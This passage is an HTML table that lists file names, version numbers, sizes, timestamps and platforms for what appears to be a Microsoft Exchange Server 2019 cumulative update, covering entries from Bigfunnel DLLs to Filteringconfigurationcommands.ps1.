applicable</td></tr><tr><td>Bigfunnel.bondtypes.dll</td><td>15.2.529.8</td><td>45,432</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Bigfunnel.common.dll</td><td>15.2.529.8</td><td>66,424</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Bigfunnel.configuration.dll</td><td>15.2.529.8</td><td>118,352</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Bigfunnel.entropy.dll</td><td>15.2.529.8</td><td>44,408</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Bigfunnel.filter.dll</td><td>15.2.529.8</td><td>54,136</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Bigfunnel.indexstream.dll</td><td>15.2.529.8</td><td>68,992</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Bigfunnel.neuraltree.dll</td><td>Not applicable</td><td>694,144</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Bigfunnel.neuraltreeranking.dll</td><td>15.2.529.8</td><td>19,832</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Bigfunnel.poi.dll</td><td>15.2.529.8</td><td>245,320</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Bigfunnel.postinglist.dll</td><td>15.2.529.8</td><td>189,304</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Bigfunnel.query.dll</td><td>15.2.529.8</td><td>101,240</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Bigfunnel.ranking.dll</td><td>15.2.529.8</td><td>109,648</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Bigfunnel.syntheticdatalib.dll</td><td>15.2.529.8</td><td>3,634,760</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Bigfunnel.tracing.dll</td><td>15.2.529.8</td><td>42,872</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Bigfunnel.wordbreakers.dll</td><td>15.2.529.8</td><td>46,464</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Cafe_airfilter_dll</td><td>15.2.529.8</td><td>42,872</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Cafe_exppw_dll</td><td>15.2.529.8</td><td>83,320</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Cafe_owaauth_dll</td><td>15.2.529.8</td><td>92,024</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>42,093</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Checkdatabaseredundancy.ps1</td><td>Not applicable</td><td>94,902</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Chksgfiles.dll</td><td>15.2.529.8</td><td>57,416</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Citsconstants.ps1</td><td>Not applicable</td><td>15,805</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Citslibrary.ps1</td><td>Not applicable</td><td>82,956</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Citstypes.ps1</td><td>Not applicable</td><td>14,760</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Classificationengine_mce</td><td>15.2.529.8</td><td>1,693,264</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Clusmsg.dll</td><td>15.2.529.8</td><td>134,008</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Coconet.dll</td><td>15.2.529.8</td><td>48,000</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Collectovermetrics.ps1</td><td>Not applicable</td><td>81,948</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Collectreplicationmetrics.ps1</td><td>Not applicable</td><td>41,870</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Commonconnectfunctions.ps1</td><td>Not applicable</td><td>30,235</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Complianceauditservice.exe</td><td>15.2.529.8</td><td>39,808</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Configureadam.ps1</td><td>Not applicable</td><td>23,068</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Configurecaferesponseheaders.ps1</td><td>Not applicable</td><td>20,308</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Configurecryptodefaults.ps1</td><td>Not applicable</td><td>42,035</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Configurenetworkprotocolparameters.ps1</td><td>Not applicable</td><td>19,766</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Configuresmbipsec.ps1</td><td>Not applicable</td><td>39,824</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Configure_enterprisepartnerapplication.ps1</td><td>Not applicable</td><td>22,283</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Connectfunctions.ps1</td><td>Not applicable</td><td>37,421</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Connect_exchangeserver_help.xml</td><td>Not applicable</td><td>29,604</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Consoleinitialize.ps1</td><td>Not applicable</td><td>24,528</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Convertoabvdir.ps1</td><td>Not applicable</td><td>20,053</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Converttomessagelatency.ps1</td><td>Not applicable</td><td>14,836</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Convert_distributiongrouptounifiedgroup.ps1</td><td>Not applicable</td><td>34,761</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Create_publicfoldermailboxesformigration.ps1</td><td>Not applicable</td><td>27,908</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.14.4.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.15.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.15.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.15.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.15.20.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts_exsmime.dll</td><td>15.2.529.8</td><td>380,792</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Cts_microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>1,686,400</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Cts_microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>501</td><td>01-Jan-2020</td><td>09:08</td><td>Not applicable</td></tr><tr><td>Cts_policy.14.0.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.14.1.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,872</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.14.2.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.14.3.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.14.4.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.15.0.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.15.1.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,880</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.15.2.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.15.20.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.8.0.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.8.1.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,872</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Cts_policy.8.2.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Cts_policy.8.3.microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Dagcommonlibrary.ps1</td><td>Not applicable</td><td>60,222</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Dependentassemblygenerator.exe</td><td>15.2.529.8</td><td>22,400</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Diaghelper.dll</td><td>15.2.529.8</td><td>67,152</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Diagnosticscriptcommonlibrary.ps1</td><td>Not applicable</td><td>16,334</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Disableinmemorytracing.ps1</td><td>Not applicable</td><td>13,358</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Disable_antimalwarescanning.ps1</td><td>Not applicable</td><td>15,181</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Disable_outsidein.ps1</td><td>Not applicable</td><td>13,654</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Disklockerapi.dll</td><td>Not applicable</td><td>22,608</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Dlmigrationmodule.psm1</td><td>Not applicable</td><td>39,576</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Dsaccessperf.dll</td><td>15.2.529.8</td><td>46,160</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Dscperf.dll</td><td>15.2.529.8</td><td>32,872</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Dup_cts_microsoft.exchange.data.common.dll</td><td>15.2.529.8</td><td>1,686,400</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Dup_ext_microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>601,472</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Ecpperfcounters.xml</td><td>Not applicable</td><td>30,344</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Edgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Edgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,880</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Edgetransport.exe</td><td>15.2.529.8</td><td>49,528</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:07</td><td>Not applicable</td></tr><tr><td>Eext_policy.14.0.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,880</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.14.1.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.14.2.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,880</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.14.3.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.14.4.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.15.0.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,880</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Eext_policy.15.1.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.15.2.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,880</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Eext_policy.15.20.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.8.1.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.8.2.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Eext_policy.8.3.microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>12,880</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Enableinmemorytracing.ps1</td><td>Not applicable</td><td>13,360</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Enable_antimalwarescanning.ps1</td><td>Not applicable</td><td>17,559</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Enable_basicauthtooauthconverterhttpmodule.ps1</td><td>Not applicable</td><td>18,584</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Enable_crossforestconnector.ps1</td><td>Not applicable</td><td>18,598</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Enable_outlookcertificateauthentication.ps1</td><td>Not applicable</td><td>22,912</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Enable_outsidein.ps1</td><td>Not applicable</td><td>13,647</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Engineupdateserviceinterfaces.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Escprint.dll</td><td>15.2.529.8</td><td>20,344</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Ese.dll</td><td>15.2.529.8</td><td>3,741,568</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Eseback2.dll</td><td>15.2.529.8</td><td>350,080</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Esebcli2.dll</td><td>15.2.529.8</td><td>318,536</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Eseperf.dll</td><td>15.2.529.8</td><td>108,920</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Eseutil.exe</td><td>15.2.529.8</td><td>425,336</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Esevss.dll</td><td>15.2.529.8</td><td>44,416</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Etweseproviderresources.dll</td><td>15.2.529.8</td><td>101,240</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Eventperf.dll</td><td>15.2.529.8</td><td>59,776</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Exchange.depthtwo.types.ps1xml</td><td>Not applicable</td><td>40,417</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Exchange.format.ps1xml</td><td>Not applicable</td><td>649,678</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Exchange.partial.types.ps1xml</td><td>Not applicable</td><td>44,647</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Exchange.ps1</td><td>Not applicable</td><td>21,123</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Exchange.support.format.ps1xml</td><td>Not applicable</td><td>26,531</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Exchange.types.ps1xml</td><td>Not applicable</td><td>365,453</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Exchangeudfcommon.dll</td><td>15.2.529.8</td><td>122,744</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Exchangeudfs.dll</td><td>15.2.529.8</td><td>272,760</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Exchmem.dll</td><td>15.2.529.8</td><td>86,608</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Exchsetupmsg.dll</td><td>15.2.529.8</td><td>19,528</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Exdbfailureitemapi.dll</td><td>Not applicable</td><td>27,008</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Exdbmsg.dll</td><td>15.2.529.8</td><td>230,784</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Exeventperfplugin.dll</td><td>15.2.529.8</td><td>25,472</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Exmime.dll</td><td>15.2.529.8</td><td>364,920</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Exportedgeconfig.ps1</td><td>Not applicable</td><td>27,391</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Export_mailpublicfoldersformigration.ps1</td><td>Not applicable</td><td>18,558</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Export_modernpublicfolderstatistics.ps1</td><td>Not applicable</td><td>28,850</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Export_outlookclassification.ps1</td><td>Not applicable</td><td>14,374</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Export_publicfolderstatistics.ps1</td><td>Not applicable</td><td>23,417</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Export_retentiontags.ps1</td><td>Not applicable</td><td>17,340</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Exppw.dll</td><td>15.2.529.8</td><td>83,320</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Exprfdll.dll</td><td>15.2.529.8</td><td>26,704</td><td>01-Jan-2020</td><td>11:25</td><td>x64</td></tr><tr><td>Exrpc32.dll</td><td>15.2.529.8</td><td>2,029,952</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Exrw.dll</td><td>15.2.529.8</td><td>28,232</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Exsetdata.dll</td><td>15.2.529.8</td><td>2,779,728</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Exsetup.exe</td><td>15.2.529.8</td><td>35,200</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Exsetupui.exe</td><td>15.2.529.8</td><td>471,936</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Extrace.dll</td><td>15.2.529.8</td><td>245,112</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Ext_microsoft.exchange.data.transport.dll</td><td>15.2.529.8</td><td>601,472</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Exwatson.dll</td><td>15.2.529.8</td><td>44,928</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Fastioext.dll</td><td>15.2.529.8</td><td>60,288</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Fil06f84122c94c91a0458cad45c22cce20</td><td>Not applicable</td><td>784,631</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Fil143a7a5d4894478a85eefc89a6539fc8</td><td>Not applicable</td><td>1,909,118</td><td>01-Jan-2020</td><td>11:25</td><td>Not applicable</td></tr><tr><td>Fil19f527f284a0bb584915f9994f4885c3</td><td>Not applicable</td><td>648,793</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Fil1a9540363a531e7fb18ffe600cffc3ce</td><td>Not applicable</td><td>358,404</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Fil220d95210c8697448312eee6628c815c</td><td>Not applicable</td><td>303,656</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Fil2cf5a31e239a45fabea48687373b547c</td><td>Not applicable</td><td>652,625</td><td>01-Jan-2020</td><td>11:25</td><td>Not applicable</td></tr><tr><td>Fil397f0b1f1d7bd44d6e57e496decea2ec</td><td>Not applicable</td><td>784,628</td><td>01-Jan-2020</td><td>11:25</td><td>Not applicable</td></tr><tr><td>Fil3ab126057b34eee68c4fd4b127ff7aee</td><td>Not applicable</td><td>784,604</td><td>01-Jan-2020</td><td>11:25</td><td>Not applicable</td></tr><tr><td>Fil41bb2e5743e3bde4ecb1e07a76c5a7a8</td><td>Not applicable</td><td>149,154</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Fil51669bfbda26e56e3a43791df94c1e9c</td><td>Not applicable</td><td>9,344</td><td>01-Jan-2020</td><td>11:25</td><td>Not applicable</td></tr><tr><td>Fil558cb84302edfc96e553bcfce2b85286</td><td>Not applicable</td><td>85,258</td><td>01-Jan-2020</td><td>11:25</td><td>Not applicable</td></tr><tr><td>Fil55ce217251b77b97a46e914579fc4c64</td><td>Not applicable</td><td>648,787</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Fil5a9e78a51a18d05bc36b5e8b822d43a8</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Fil5c7d10e5f1f9ada1e877c9aa087182a9</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Fil6569a92c80a1e14949e4282ae2cc699c</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Fil6a01daba551306a1e55f0bf6894f4d9f</td><td>Not applicable</td><td>648,763</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Fil8863143ea7cd93a5f197c9fff13686bf</td><td>Not applicable</td><td>648,793</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Fil8a8c76f225c7205db1000e8864c10038</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Fil8cd999415d36ba78a3ac16a080c47458</td><td>Not applicable</td><td>784,634</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Fil97913e630ff02079ce9889505a517ec0</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Filaa49badb2892075a28d58d06560f8da2</td><td>Not applicable</td><td>785,658</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Filae28aeed23ccb4b9b80accc2d43175b5</td><td>Not applicable</td><td>648,790</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Filb17f496f9d880a684b5c13f6b02d7203</td><td>Not applicable</td><td>784,634</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Filb94ca32f2654692263a5be009c0fe4ca</td><td>Not applicable</td><td>2,564,949</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Filbabdc4808eba0c4f18103f12ae955e5c</td><td>Not applicable</td><td>342,793,037</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Filc92cf2bf29bed21bd5555163330a3d07</td><td>Not applicable</td><td>652,643</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Filcc478d2a8346db20c4e2dc36f3400628</td><td>Not applicable</td><td>784,634</td><td>01-Jan-2020</td><td>11:24</td><td>Not applicable</td></tr><tr><td>Fild26cd6b13cfe2ec2a16703819da6d043</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Filf2719f9dc8f7b74df78ad558ad3ee8a6</td><td>Not applicable</td><td>785,640</td><td>01-Jan-2020</td><td>11:25</td><td>Not applicable</td></tr><tr><td>Filfa5378dc76359a55ef20cc34f8a23fee</td><td>Not applicable</td><td>1,427,187</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Filteringconfigurationcommands.ps1</td><td>Not applicable</td><td>18,535</td><td>01-Jan-2020</td><td>11:21</td><td>Not 